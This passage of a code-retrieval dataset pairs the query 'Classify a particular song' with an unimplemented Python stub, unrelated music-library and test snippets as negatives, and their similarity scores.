"def load_data():\n\n current_artist = None\n current_album = None\n artist_list = []\n\n print(\"Loading music data...\")\n\n with open(\"albums.txt\", \"r\") as albums:\n for line in albums:\n # bind variables to the fields of each line (stripping new line char and splitting on tabs)\n artist_field, album_field, year_field, song_field = tuple(line.strip(\"\\n\").split(\"\\t\"))\n year_field = int(year_field) # convert string value to int\n print(f\"\\t{artist_field}:{album_field}:{year_field}:{song_field}\")\n\n # Creates an Artist object for the artists read from artist_field using the current_artist tracker.\n # If there's no current_artist, simply creates an Artist object for the first artist read.\n if current_artist is None:\n current_artist = Artist(artist_field)\n # If there is a current current_artist, uses that tracker to detect when the artist being read changes.\n # When this happens, adds current current_album to the artists album list,\n # appends the artist to the artist list, creates a new Artist object for the next artist being read,\n # and resets current_album to None.\n elif current_artist.name != artist_field:\n current_artist.add_album(current_album)\n artist_list.append(current_artist)\n current_artist = Artist(artist_field)\n current_album = None\n\n # Creates an Album object for the albums read from album_field using the current_album tracker.\n # Follows a very similar process to the current_artist assignment above.\n if current_album is None:\n current_album = Album(album_field, year_field, current_artist)\n elif current_album.name != album_field:\n current_artist.add_album(current_album)\n current_album = Album(album_field, year_field, current_artist)\n\n # Creates a new Song object, and adds it to current_album object\n current_song = Song(song_field, current_artist)\n current_album.add_song(current_song)\n\n # Add final artist/album to their respective lists\n if current_artist is not None:\n if current_album is not None:\n current_artist.add_album(current_album)\n artist_list.append(current_artist)\n\n print(f\"A total of {len(artist_list)} artists were loaded.\")\n print()\n print(\"=\" * 40)\n print()\n return artist_list", "def test_0():\n sync.gen_multi_fake_data()#default is only one randomly selected data set\n sync.main(testing=True)", "def test_get_songs_no_params(self, track_elms, service_config, request):\n service_config.track_store.get_all.return_value = track_elms\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n 
results = service.get_songs(params)\n\n assert results == track_elms, 'Expected all tracks returned'", "def get_artist_audio_features(q, interactive = False, genre_delimiter = '-!!-', to_file = '', client = None):\n query = client.search(q = q, type = \"artist\")\n items = query['artists']['items']\n\n if not items:\n raise Exception(\"No artists found\")\n\n if interactive:\n print(\"Select the artist to use...\")\n print(\"\\n\".join(\"[{}]: {}\".format(ii, entry['name']) for ii, entry in enumerate(items)))\n artist_indx = int(input(\"artist number: \").strip())\n if artist_indx > len(items):\n raise IndexError(\"Selected number higher than options available\")\n artist = items[artist_indx]\n else:\n artist = items[0]\n\n # get artist genres\n artist_genres = genre_delimiter.join(artist['genres']) if genre_delimiter else None\n\n # get artist albums\n albums = get_artist_albums(artist['id'])\n albums['artist_genres'] = artist_genres\n\n # get album popularity\n album_popularity = get_album_popularity(albums.id)\n\n # get album tracks\n tracks = get_album_tracks(albums.id)\n\n # get track audio features\n features = get_track_features(tracks.id)\n\n # get track popularity\n popularity = get_track_popularity(tracks.id)\n\n album_data = albums.merge(album_popularity, 'left', 'id')\n\n track_data = tracks \\\n .drop(columns = ['type']) \\\n .merge(popularity, 'left', 'id') \\\n .merge(features.drop(columns = ['uri', 'type', 'duration_ms']), 'left', 'id')\n\n\n merged = prefix_merge(album_data, track_data, ['album_', 'track_'], how = 'left', on = 'album_id')\n\n if to_file:\n merged.to_csv(to_file)\n\n return merged", "def main():\n songs = []\n first_line = sys.stdin.readline().split(' ', 1)\n songs_on_album, songs_to_select = int(first_line[0]), int(first_line[1])\n for i in range(songs_on_album):\n line = sys.stdin.readline().split(' ', 1)\n song = Song(line[1], int(line[0]), i+1)\n songs.append(song)\n\n print_quality_songs(songs, songs_to_select)", "def all_artists(our_data):\n return [album['artist'] for album in our_data]", "def _match_tracks(artist, title, mb_tracks):\n # pylint: disable=R0914\n dbg(\"artists is %s\", artist)\n dbg(\"title is %s\", title)\n title_artist_str = c.g + title + c.w, c.g + artist + c.w\n xprint(\"\\nSearching for %s by %s\\n\\n\" % title_artist_str)\n\n def dtime(x):\n \"\"\" Format time to M:S. 
\"\"\"\n return time.strftime('%M:%S', time.gmtime(int(x)))\n\n # do matching\n for track in mb_tracks:\n ttitle = track['title']\n length = track['length']\n xprint(\"Search : %s%s - %s%s - %s\" % (c.y, artist, ttitle, c.w,\n dtime(length)))\n q = \"%s %s\" % (artist, ttitle)\n w = q = ttitle if artist == \"Various Artists\" else q\n query = generate_search_qs(w, 0, result_count=50)\n dbg(query)\n have_results = _search(q, query, splash=False, pre_load=False)\n\n if not have_results:\n xprint(c.r + \"Nothing matched :(\\n\" + c.w)\n continue\n\n results = g.model.songs\n s, score = _best_song_match(results, artist + \" \" + ttitle, length)\n cc = c.g if score > 85 else c.y\n cc = c.r if score < 75 else cc\n xprint(\"Matched: %s%s%s - %s \\n[%sMatch confidence: \"\n \"%s%s]\\n\" % (c.y, s.title, c.w, fmt_time(s.length),\n cc, score, c.w))\n yield s", "def artist_comparisons():\n file_names = os.listdir(\"lyrics_files\")\n songs_dict = {song_file[:-8]: pickle.load(open(\"lyrics_files/\" + song_file, 'rb')) for song_file in file_names} # filenames end with _songs.p, so we use -8 to delete that\n artists = songs_dict.keys()\n output_dict = {}\n artist_pairs = []\n print \"Comparing artists\"\n for i in xrange(0, len(artists) - 1):\n for j in xrange(i + 1, len(artists)):\n artist_pairs.append((artists[i], artists[j]))\n for pair in artist_pairs:\n print pair\n output_dict[pair] = compare_artists(pair[0], pair[1], songs_dict)\n print output_dict[pair] \n pickle.dump(output_dict, open(\"artist_comparisons.p\", \"wb\"))\n print \"Pickled artist comparisons\"", "def recommendation_genre_seeds(self) -> List[str]:\n return self._get('recommendations/available-genre-seeds')['genres']", "def test_items(self):\n obs = self.tester.items()\n self.assertTrue(isinstance(obs, Iterable))\n exp = [('1.SKB1.640202', Sample('1.SKB1.640202', self.tester)),\n ('1.SKB2.640194', Sample('1.SKB2.640194', self.tester)),\n ('1.SKB3.640195', Sample('1.SKB3.640195', self.tester)),\n ('1.SKB4.640189', Sample('1.SKB4.640189', self.tester)),\n ('1.SKB5.640181', Sample('1.SKB5.640181', self.tester)),\n ('1.SKB6.640176', Sample('1.SKB6.640176', self.tester)),\n ('1.SKB7.640196', Sample('1.SKB7.640196', self.tester)),\n ('1.SKB8.640193', Sample('1.SKB8.640193', self.tester)),\n ('1.SKB9.640200', Sample('1.SKB9.640200', self.tester)),\n ('1.SKD1.640179', Sample('1.SKD1.640179', self.tester)),\n ('1.SKD2.640178', Sample('1.SKD2.640178', self.tester)),\n ('1.SKD3.640198', Sample('1.SKD3.640198', self.tester)),\n ('1.SKD4.640185', Sample('1.SKD4.640185', self.tester)),\n ('1.SKD5.640186', Sample('1.SKD5.640186', self.tester)),\n ('1.SKD6.640190', Sample('1.SKD6.640190', self.tester)),\n ('1.SKD7.640191', Sample('1.SKD7.640191', self.tester)),\n ('1.SKD8.640184', Sample('1.SKD8.640184', self.tester)),\n ('1.SKD9.640182', Sample('1.SKD9.640182', self.tester)),\n ('1.SKM1.640183', Sample('1.SKM1.640183', self.tester)),\n ('1.SKM2.640199', Sample('1.SKM2.640199', self.tester)),\n ('1.SKM3.640197', Sample('1.SKM3.640197', self.tester)),\n ('1.SKM4.640180', Sample('1.SKM4.640180', self.tester)),\n ('1.SKM5.640177', Sample('1.SKM5.640177', self.tester)),\n ('1.SKM6.640187', Sample('1.SKM6.640187', self.tester)),\n ('1.SKM7.640188', Sample('1.SKM7.640188', self.tester)),\n ('1.SKM8.640201', Sample('1.SKM8.640201', self.tester)),\n ('1.SKM9.640192', Sample('1.SKM9.640192', self.tester))]\n # Creating a list and looping over it since unittest does not call\n # the __eq__ function on the objects\n for o, e in zip(sorted(list(obs)), 
sorted(exp)):\n self.assertEqual(o, e)", "def fixed_test_audio(self, num_test_audio):\n test_filenames = np.random.choice(self.filepaths, num_test_audio)\n test_noisy_set = [np.load(f)[1] for f in test_filenames]\n # file names of test samples\n test_basenames = [os.path.basename(fpath) for fpath in test_filenames]\n return test_basenames, np.array(test_noisy_set).reshape(num_test_audio, 1, 16384)", "def test_check_alter_names():\n gene_list = []\n gene, gene_list= check_gff(INPUT_ok, gene_list)\n # print(gene, gene_list)\n assert_equal(gene, \"GPLIN_000000100\")\n assert_equal(gene_list, [\"GPLIN_000000100\"])", "def test_various_artists(self):\n self.add_mp3(artist='Artist 1', title='Title 1',\n album='Album 1', filename='song1.mp3', path='album_1')\n self.add_mp3(artist='Artist 2', title='Title 2',\n album='Album 1', filename='song2.mp3', path='album_1')\n self.add_mp3(artist='Artist 2', title='Title 3',\n album='Album 2', filename='song3.mp3', path='album_2')\n self.add_mp3(artist='Artist 3', title='Title 4',\n album='Album 2', filename='song4.mp3', path='album_2')\n self.run_add()\n\n self.assertEqual(Artist.objects.count(), 4)\n self.assertEqual(Album.objects.count(), 2)\n self.assertEqual(Song.objects.count(), 4)\n\n artist_1 = Artist.objects.get(name='Artist 1')\n artist_2 = Artist.objects.get(name='Artist 2')\n artist_3 = Artist.objects.get(name='Artist 3')\n various = Artist.objects.get(name='Various')\n\n album_1 = Album.objects.get(name='Album 1')\n album_2 = Album.objects.get(name='Album 2')\n\n song_1 = Song.objects.get(filename='album_1/song1.mp3')\n song_2 = Song.objects.get(filename='album_1/song2.mp3')\n song_3 = Song.objects.get(filename='album_2/song3.mp3')\n song_4 = Song.objects.get(filename='album_2/song4.mp3')\n\n response = self.client.get(reverse('exordium:artist', args=(artist_1.normname,)))\n self.assertEqual(response.status_code, 200)\n\n # Only the Various Artists album should show up\n self.assertContains(response, '1 album')\n self.assertQuerysetEqual(response.context['albums'].data, [repr(album_1)])\n self.assertContains(response, reverse('exordium:album', args=(album_1.pk,)))\n self.assertContains(response, reverse('exordium:artist', args=(various.normname,)))\n self.assertNotContains(response, str(album_2))\n self.assertNotContains(response, reverse('exordium:album', args=(album_2.pk,)))\n\n # Only one song should show up\n self.assertContains(response, '1 song')\n self.assertQuerysetEqual(response.context['songs'].data, [repr(song_1)])\n self.assertContains(response, reverse('exordium:artist', args=(artist_1.normname,)))\n # This check is a bit silly since it's already shown up above\n self.assertContains(response, reverse('exordium:album', args=(album_1.pk,)))\n self.assertContains(response, song_1.get_download_url_html5())\n self.assertContains(response, song_1.get_download_url_m3u())\n for song in [song_2, song_3, song_4]:\n self.assertNotContains(response, str(song))\n self.assertNotContains(response, song.get_download_url_html5())\n self.assertNotContains(response, song.get_download_url_m3u())\n\n # Shouldn't see any links to our other two artists\n for artist in [artist_2, artist_3]:\n self.assertNotContains(response, str(artist))\n self.assertNotContains(response, reverse('exordium:artist', args=(artist.normname,)))", "def ar_gen(frequentItemSets):\n# print frequentItemSets\n for fItemSet in frequentItemSets:\n if fItemSet:\n itemSets = fItemSet.keys()\n for itemSet in itemSets:\n subsets = subset_gen(itemSet)\n# print itemSet\n# print subsets\n 
if subsets:\n for subset in subsets:\n sptSubSet = supportItemSet(subset, frequentItemSets)\n sptSubSets = supportItemSet(itemSet, frequentItemSets)\n print subset,'->', itemSet.difference(subset), 'confidence=',sptSubSets/float(sptSubSet)", "def test_values(self):\n obs = self.tester.values()\n self.assertTrue(isinstance(obs, Iterable))\n exp = {PrepSample('1.SKB1.640202', self.tester),\n PrepSample('1.SKB2.640194', self.tester),\n PrepSample('1.SKB3.640195', self.tester),\n PrepSample('1.SKB4.640189', self.tester),\n PrepSample('1.SKB5.640181', self.tester),\n PrepSample('1.SKB6.640176', self.tester),\n PrepSample('1.SKB7.640196', self.tester),\n PrepSample('1.SKB8.640193', self.tester),\n PrepSample('1.SKB9.640200', self.tester),\n PrepSample('1.SKD1.640179', self.tester),\n PrepSample('1.SKD2.640178', self.tester),\n PrepSample('1.SKD3.640198', self.tester),\n PrepSample('1.SKD4.640185', self.tester),\n PrepSample('1.SKD5.640186', self.tester),\n PrepSample('1.SKD6.640190', self.tester),\n PrepSample('1.SKD7.640191', self.tester),\n PrepSample('1.SKD8.640184', self.tester),\n PrepSample('1.SKD9.640182', self.tester),\n PrepSample('1.SKM1.640183', self.tester),\n PrepSample('1.SKM2.640199', self.tester),\n PrepSample('1.SKM3.640197', self.tester),\n PrepSample('1.SKM4.640180', self.tester),\n PrepSample('1.SKM5.640177', self.tester),\n PrepSample('1.SKM6.640187', self.tester),\n PrepSample('1.SKM7.640188', self.tester),\n PrepSample('1.SKM8.640201', self.tester),\n PrepSample('1.SKM9.640192', self.tester)}\n # Creating a list and looping over it since unittest does not call\n # the __eq__ function on the objects\n for o, e in zip(sorted(list(obs), key=lambda x: x.id),\n sorted(exp, key=lambda x: x.id)):\n self.assertEqual(o, e)", "def test_sounds_id_get(self):\n pass", "def test_ms_playlist_search(helpers):\n item_from_xml, item_from_dict = common_tests(\n MSAlbumList,\n MS_PLAYLIST_SEARCH_XML,\n MS_PLAYLIST_SEARCH_DICT,\n \"00020064playlistsearch:Dans &\",\n helpers,\n )\n getter_attributes_test(\n \"uri\", item_from_xml, item_from_dict, MS_PLAYLIST_SEARCH_DICT[\"uri\"]\n )", "def candidates(self, items, artist, album, va_likely):\n candidate_list = []\n candidate_list.append(WikiAlbum(artist, album))\n\n return candidate_list", "def test_bunch_of_files(self):\n bunch = [\"1.тест.mp3\", \"2.smash.mp3\", \"3.дdд.mp3\"]\n expected = [\"1.test.mp3\", \"2.smash.mp3\", \"3.ddd.mp3\"]\n for audio in bunch:\n f = open(audio, 'w+')\n f.close()\n audios = filter(lambda x: x.endswith(\".mp3\"), os.listdir())\n for audio in audios:\n rename_audio(audio)\n audios = filter(lambda x: x.endswith(\".mp3\"), os.listdir())\n for a, b in zip(audios, expected):\n print(a, b)\n for filename, expectation in zip(audios, expected):\n self.assertEqual(filename, expectation)", "def get_movies_by_genre(self, genre: str):\n raise NotImplementedError", "def test_filterSamples(self):\r\n exp = ['PC.356', 'PC.593']\r\n self.overview_map.filterSamples(['PC.593', 'PC.356'])\r\n obs = self.overview_map.SampleIds\r\n self.assertEqual(obs, exp)\r\n\r\n self.overview_map.filterSamples([])\r\n self.assertEqual(self.overview_map.SampleIds, [])" ]
[ "0.6808168", "0.65337896", "0.63130933", "0.61084867", "0.5960939", "0.59207577", "0.57667565", "0.5645742", "0.56377244", "0.5593208", "0.55835515", "0.5554038", "0.5543787", "0.551411", "0.55078", "0.5503138", "0.5479609", "0.54730666", "0.54501826", "0.5445314", "0.5428625", "0.5417381", "0.54008317", "0.53966415", "0.5386453", "0.53828526", "0.53826547", "0.5367364", "0.5366679", "0.5365371", "0.53647596", "0.5359856", "0.5348318", "0.5341709", "0.5333103", "0.53196216", "0.5308514", "0.5287704", "0.5280575", "0.5279823", "0.52755874", "0.5263987", "0.52489567", "0.5239795", "0.52361965", "0.5223399", "0.52200556", "0.52195746", "0.5195377", "0.5188798", "0.51754636", "0.51716655", "0.51661986", "0.5158656", "0.51568234", "0.51542425", "0.5150297", "0.5150101", "0.5148367", "0.5131027", "0.5108495", "0.5099789", "0.5099706", "0.5095855", "0.5094745", "0.509272", "0.50864196", "0.5071111", "0.506868", "0.505849", "0.50526065", "0.50515574", "0.5044688", "0.50408334", "0.50406456", "0.504008", "0.5038693", "0.5028265", "0.50203985", "0.50183827", "0.5014878", "0.5013931", "0.50136024", "0.500582", "0.5005778", "0.49981248", "0.4989734", "0.4976592", "0.49630708", "0.49576437", "0.49570942", "0.49512517", "0.4947417", "0.4940064", "0.4938069", "0.49358615", "0.49341276", "0.49306786", "0.49297038", "0.4927558" ]
0.65475684
1
Classify a particular song.
def classify(self, song): raise NotImplementedError
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def classify_playlist(classifier, playlist_feature_data, playlist_data_dict):\n\n clf, clf_name = classifier\n\n playlist_features, playlist_song_ids = playlist_feature_data\n # run classifier on playlist songs\n results = clf.predict_all(playlist_features)\n liked_songs = [playlist_song_ids[i] for i in range(len(results)) if results[i] == 1]\n\n # get songs they'd like based on song ID\n if not liked_songs:\n print(\n \"The classifier \"\n + clf_name\n + \" thinks you wouldn't like any songs in \\\n the given playlist.\"\n )\n return\n\n print(\n \"The classifier \"\n + clf_name\n + \" thinks you'd like the following from the given playlist:\\n\"\n )\n\n for song in liked_songs:\n print(playlist_data_dict[song][\"metadata\"][\"track_name\"])\n\n numLiked = len(liked_songs)\n totalSongs = len(playlist_song_ids)\n matchRate = numLiked / totalSongs * 100\n\n print(\n \"The classifier \"\n + clf_name\n + \" thinks you'd dislike the following from the given playlist:\\n\"\n )\n for song in playlist_song_ids:\n if song not in liked_songs:\n print(playlist_data_dict[song][\"metadata\"][\"track_name\"])\n\n # spotify:playlist:37i9dQZF1DWXJfnUiYjUKT\n\n # spotify:playlist:37i9dQZF1DXcRXFNfZr7Tp\n\n print(f\"Thats a taste match of {matchRate}%\")\n print()\n return", "def song(song_id):\n return process_input(song_id) #jsonify(recomendations)", "def song(self, value):\r\n self._song_id = value\r\n data = Song(value)\r\n self.songtitel = data.songtitel if data.found else \"\"", "def associate_song(self, song):\n self.songs.append(song)", "def __add_song(self, song, genius_api):\n\t\tentry = {\n\t\t\t'id' : int(song['id']),\n\t\t\t'title' : song['title'],\n\t\t\t'primary_artist' : {\n\t\t\t\t'id' : song['primary_artist']['id'],\n\t\t\t\t'name' : str(song['primary_artist']['name']).lower(),\n\t\t\t\t'url' : song['primary_artist']['url'],\n\t\t\t\t'is_verified' : song['primary_artist']['is_verified'],\n\t\t\t\t},\n\t\t\t'url' : song['url'],\n\t\t\t'lyrics' : genius_api.get_lyrics(song['id'], song['url'])\n\t\t\t}\n\t\tif song['album']:\n\t\t\tentry['album'] = {\n\t\t\t\t'id': song['album']['id'], \n\t\t\t\t'full_title': song['album']['full_title'], \n\t\t\t\t'name': song['album']['name'], \n\t\t\t\t'artist': song['album']['artist']['id']\n\t\t\t\t}\n\t\tif song['release_date']:\n\t\t\tentry['release_date'] = song['release_date']\n\t\tif len(song['featured_artists']) > 0:\n\t\t\tfeatured_artists = list()\n\t\t\tfor artist in song['featured_artists']:\n\t\t\t\tart = {\n\t\t\t\t\t'id' : artist['id'],\n\t\t\t\t\t'name' : artist['name'].lower()\n\t\t\t\t\t}\n\t\t\t\tfeatured_artists.append(art)\n\t\t\tentry['featured_artists'] = featured_artists\n\t\t\t#Step 3: Insert Artist into MongoDB via isnert_one\n\t\tself.db.songs.insert_one(entry)", "def import_song(self, song, playlist):\n\n try:\n song_uri = self.find_song_uri(song)\n except SongNotFoundError as e:\n print(f\"could not find song {song} to add to playlist '{playlist['name']}'\")\n else:\n self.add_song_to_playlist(song_uri, playlist[\"id\"])", "def classify(new_music,fit):\n\tr = robjects.r\n\tp = prob_category(new_music,fit)\n\trobjects.globalenv[\"pred\"] = p\n\tr(\"\"\"\n\ttmp3 = vector()\n\tfor(i in 1:length(pred[,1])){\n\t\txx <- unlist(pred[i,])\n\t\ttmp3 <- append(tmp3,which(xx==max(xx)))\n\t}\n\tclasses <- names(tmp3)\n\t\"\"\")\n\treturn list(robjects.globalenv[\"classes\"])", "def add_song(self, song):\n self.songs.append(song)", "def test_song(self):\n doc = et.parse_xml(SONG)\n song = doc.find('song')\n store = DummyStore()\n track = 
ampache_storage.Track(store, song)\n self.assertEqual(track.get_id(), 'song.3180')\n self.assertEqual(track.parent_id, 'album.2910')\n self.assertEqual(track.duration, '0:03:54')\n self.assertEqual(track.get_url(),\n 'http://localhost/play/index.php?oid=123908...')\n self.assertEqual(track.get_name(), 'Hells Bells')\n self.assertEqual(track.title, 'Hells Bells')\n self.assertEqual(track.artist, 'AC/DC')\n self.assertEqual(track.album, 'Back in Black')\n self.assertEqual(track.genre, None)\n self.assertEqual(track.track_nr, '4')\n self.assertEqual(track.cover, 'http://localhost/image.php?id=129348')\n self.assertEqual(track.mimetype, 'audio/mpeg') # guessed\n self.assertEqual(track.size, 654321)\n self.assertIs(track.get_path(), None)\n self.assertEqual(track.get_children(), [])\n self.assertEqual(track.get_child_count(), 0)", "def cheer(self, songs):\n if self.favourite_song in songs:\n return \"Whoo!\"", "def add_song(self, song: Song) -> None:\n\n self.songs.append(song)\n self.set_song_count(len(self.songs))", "def update(self, song: int) -> None:\n if 0 <= song < len(self.sounds):\n self.sounds[song].play()", "def analyze(title, artist):\n lyric_sentiment = 0\n title_sentiment = 0\n\n # Load the machine learning based model\n modelIMDB = nn_lyrics.loadModel(\"IMDB\")\n encoderIMDB = nn_lyrics.createEncoder(\"IMDB\")\n modelYelp = nn_lyrics.loadModel(\"Yelp\")\n encoderYelp = nn_lyrics.createEncoder(\"Yelp\")\n\n # Get the lyrics of the song\n print(\"Analyzing\", title, \"by\", artist, \"...\\n\")\n song = basic_lyrics.getSong(title, artist)\n if song is None:\n return\n lyrics_received = basic_lyrics.getLyrics(song)\n print(\"\")\n\n # weight_map = lyric_weights.getWeightMap(lyrics_received) Needed for line by line analysis\n\n # Get and print stats about the song\n feature_vec = features.getTrackFeatures(title, artist)\n features.printFeatures(feature_vec)\n tempo = int(feature_vec[5])\n mode = int(feature_vec[7])\n loudness = int(feature_vec[8])\n\n # Lexicon based analysis\n lyric_sentiment += ((basic_lyrics.analyze(lyrics_received, print=False) + 1)/2) # x+1/2 to convert to 0-1 scale\n title_sentiment += ((basic_lyrics.analyze(title, print=False) + 1)/2)\n\n # IMDB Model prediction\n imdb_lyrics = nn_lyrics.predict(lyrics_received, pad=True, model_to_predict=modelIMDB,\n encoder=encoderIMDB, prepro=True)\n lyric_sentiment += imdb_lyrics\n imdb_title = nn_lyrics.predict(title, pad=False, model_to_predict=modelIMDB,\n encoder=encoderIMDB, prepro=False) # Don't pre-process title since it is so short\n title_sentiment += imdb_title\n\n # Yelp Model Prediction\n yelp_lyrics = nn_lyrics.predict(lyrics_received, pad=True, model_to_predict=modelYelp,\n encoder=encoderYelp, prepro=True)\n lyric_sentiment += yelp_lyrics\n yelp_title = nn_lyrics.predict(title, pad=False, model_to_predict=modelYelp,\n encoder=encoderYelp, prepro=False)\n title_sentiment += yelp_title\n\n lyric_sentiment = lyric_sentiment/3\n title_sentiment = title_sentiment/3\n\n print(\"\\nLyric Sentiment: \", lyric_sentiment)\n print(\"\\nTitle Sentiment: \", title_sentiment)\n\n final_sentiment = equation.sentiment(mode, lyric_sentiment, title_sentiment, loudness, tempo)\n\n print(\"\\nFinal Sentiment: \", final_sentiment)", "def __init__(self, SONG):\n self.track_name = SONG['name']\n self.artist_name = SONG['artist']\n self.provider = 'lastfm'\n self.track_number = \"1\"\n self.collection_name = \"\"\n self.release_date = \"\"\n self.artwork_url_100 = SONG[\"image\"][-1][\"#text\"]\n self.track_time = \"\"\n 
self.primary_genre_name = \"N/A\"", "def importsong(fpath):\n result = \"\"\n\n tags = checkid3(fpath)\n if tags is not None:\n sig = sigfile(fpath)\n exsong = Song.objects.filter(uniq=sig)\n\n if len(exsong) > 0:\n if exsong[0].filename != fpath:\n result = updatesong(exsong[0], fpath)\n else:\n result = \"[X] %s\" % exsong[0].title\n else:\n result = createsong(tags, sig, fpath, songminplay())\n else:\n logger.error('No tags found in [%s]' % fpath)\n\n return result", "def __add_lyric(self, song, genius_api):\n\t\tentry = {\n\t\t\t'song_id' : int(song['id']),\n\t\t\t'song_title' : song['title'],\n\t\t\t'url' : song['url']\n\t\t\t}\n\t\ttry:\n\t\t\tentry['lyrics'] = genius_api.get_lyrics(song['id'], song['url'])\n\t\texcept:\n\t\t\tentry['lyrics'] = ''\t\n\t\t\t\t#Step 3: Insert Artist into MongoDB via isnert_one\n\t\ttry:\n\t\t\tself.db.lyrics.insert_one(entry)\n\t\texcept errors.DuplicateKeyError:\n\t\t\tpass", "def get_song(track):\n # Extract some identifying track information\n Title = track['name'].encode('utf-8')\n title = normalize(Title)\n Artist = [a['name'].encode('utf-8') for a in track['artists']]\n Album = track['name'].encode('utf-8')\n Popularity = track['popularity']\n # Put information into a namedTuple for convenience\n song = Track(Title, Artist, Album, Popularity, title)\n return song", "def classify(self, example):\n raise NotImplementedError()", "def song(self):\n if self.__class__.__name__ == 'Song':\n return self\n return self.parent.song", "def _extract_songObj(self):\n if self.URL_type == \"youtube\":\n self.title = self.songObj.title\n self.URL = self.songObj.URL\n self._get_youtube_data_url()\n elif self.URL_type == \"soundcloud\":\n self.title = self.songObj.title\n self.stream_url = self.songObj.URL", "def tekstowo_song(url, save):\n print '[crawler] processing tekstowo_song({}, {})'.format(url, save)\n source = html_dl(url)\n try :\n tags = tesktowo_tags(source)\n yt_url = tekstowo_youtube_url(source)\n ret = youtube_dl_mp3(yt_url)\n except Exception, e:\n print e\n print colored(\"[crawler] processing TERMINATED\", \"red\")\n return\n if recognize(ret['path']) != -1:\n remove_file(ret['path'], save)\n print colored('[crawler] song already in database', 'yellow')\n return\n\n print '[crawler] adding song into database...'\n err = addSong(ret['path'], tags)\n remove_file(ret['path'], save)\n if err != 1:\n print '[crawler] ERROR: while adding song [addSong() errno: %d]' % err\n return\n print colored('[crawler] SUCCESS: song added into database', 'green')", "def load(self, song):\n self.currentSongName = song\n self.currentSong = pygame.mixer.music.load(song)", "def predictType(self):\n return 'Music' if self.name.startswith('mu') else 'Speech'", "def classify_pic(pic_id, pic_name, pic_q):\n if pic_id not in classify_data:\n is_success = download_file(pic_id, pic_name)\n if is_success:\n classify_data[pic_id] = recognize_pic(pic_name)\n else:\n # add pic to the queue on unsuccessful download\n pic_q.put((pic_id, pic_name))\n os.remove(pic_name) # delete pic from local directory\n else:\n print ('%s already classified' % pic_name)", "def classify(self, audio_sample, should_print=True):\n features_left, features_right = self.extract_features(audio_sample)\n classification_counts = [0 for x in range(len(self.speakers))]\n\n for i in range(len(features_left)):\n feature = np.reshape(features_left[i, :], (1, -1))\n\n left_pred = int(self.left_model.predict(feature)[0])\n classification_counts[left_pred] += 1\n\n if self.both_channels:\n right_pred = 
int(self.right_model.predict(feature)[0])\n classification_counts[right_pred] += 1\n\n probabilities = np.array(classification_counts) / sum(classification_counts)\n pred = np.argmax(probabilities)\n\n if should_print:\n print(probabilities)\n\n if probabilities[pred] > self.certainty:\n print(\"Identified %s\" % self.speakers[pred])\n return self.speakers[pred]\n else:\n print(\"Unidentified Speaker\")\n return -1", "def add_song(self, song: Song):\n self.playlist.append(song)", "def play_music(sid):\n # Get the parameters for the get_song_id request\n artist = None\n album = None\n title = None\n if not request.json:\n # If no JSON parameters were given, just resume playing the song\n db = sqlite3.connect('/home/tropius/TROPIUS/TROPIUS.db')\n host = hosts.get_detail(db, sid)\n spotify.resume(host['ip'])\n return jsonify({})\n else:\n try:\n # Get the host data from the database\n db = sqlite3.connect('/home/tropius/TROPIUS/TROPIUS.db')\n host = hosts.get_detail(db, sid)\n artist = None\n album = None\n track = None\n if request.json.has_key('track') and request.json.get('track'):\n track = request.json.get('track')\n elif request.json.has_key('album') and request.json.get('album'):\n album = request.json.get('album')\n elif request.json.has_key('artist') and request.json.get('artist'):\n artist = request.json.get('artist')\n else:\n spotify.resume(host['ip'])\n return jsonify({})\n spotify.compound_play(host['ip'], artist=artist, album=album, song=track)\n return jsonify({})\n except:\n abort(400)", "async def spotify(self, ctx, *, query):\n\n # Setup the headers with the token that should be here\n headers = {\"Authorization\": \"Bearer {}\".format(self._token)}\n opts = {\"q\": query, \"type\": \"track\"}\n url = \"https://api.spotify.com/v1/search\"\n response = await utils.request(url, headers=headers, payload=opts)\n try:\n await ctx.send(\n response.get(\"tracks\")\n .get(\"items\")[0]\n .get(\"external_urls\")\n .get(\"spotify\")\n )\n except (KeyError, AttributeError, IndexError):\n await ctx.send(\"Couldn't find a song for:\\n{}\".format(query))", "def get_genius_song(song_name, artist_name, genius):\n song_search = song_name\n for i in range(0, 2):\n song = genius.search_song(song_search, artist_name)\n if isinstance(song, type(None)) or not match(\n\t (song_search, artist_name), (song.title, song.artist)\n ):\n if i:\n log(f\"Song '{song_search}' by '{artist_name}' not found on Genius\")\n return\n else:\n log(f\"Song '{song_search}' by '{artist_name}' not found on Genius trying cleaning\")\n song_search = clean(song_search)\n else:\n if i:\n log(f\"Found match for '{song_search}' by '{artist_name}'\")\n break\n\n return song", "def song_changed(self, song):\n if song == NOTPLAYING:\n print(\"Not playing\")\n else:\n print(\"Changed to: {} - {}\". 
format(song.get('artist', 'Unknown artist'), song.get('title', 'Unknown title')))\n self._publish({TAGS[tag]: value for (tag, value) in song.items() if tag in TAGS})", "def disassociate_song(self, song):\n self.songs.remove(song)", "def add_song(self, song, position=None):\n\n song_found = find_object(song, self.tracks)\n if song_found is None:\n song_found = Song(song, self.artist)\n if position is None:\n self.tracks.append(song_found)\n else:\n self.tracks.insert(position, song_found)", "def find_artist_playlist(data):\n\n return data['artist'].lower() + '.m3u'", "def markfile(self, song_id):\n cur = self.conn.cursor()\n query = \"\"\"UPDATE caro_song SET score = -1000 WHERE id=%s\"\"\"\n cur.execute(query, (song_id, ))\n\n self.memcache.delete(\":1:song_%d\" % song_id)\n\n query = \"\"\"DELETE FROM caro_playlistentry WHERE song_id=%s\"\"\"\n cur.execute(query, (song_id, ))", "def scrape_song(url):\n soup = scrapekit.handle_url(url)\n\n contents = scrape_id_to_div(soup, \"Lyrics\")\n if not contents:\n return None\n\n filetext = ''.join(c.text for c in contents)\n\n # Check if there is a reprise\n REPRISE = 'Reprise'\n\n reprise = soup.find(id=REPRISE)\n if reprise:\n filetext += '\\n\\n'\n filetext += REPRISE + ':\\n\\n'\n\n contents = scrape_id_to_div(soup, REPRISE)\n filetext += ''.join(c.text for c in contents)\n\n # Get song title, fix blank spaces for file name\n songtitle = soup.title.text.split('|')[0]\n\n song_text = ''\n song_text += 'Song: {}\\n'.format(songtitle)\n song_text += get_infobox_info(soup)\n song_text += '\\n\\n'\n song_text += filetext\n\n return song_text", "def save_song(self):\n if self.is_stream:\n self.save_song_from_stream()\n else:\n self.save_song_from_file()", "def delete_song(song):\n logging.debug('{CRUD_operations} BEGIN function delete_song()')\n logging.debug('{CRUD_operations} Data received: song: %s', 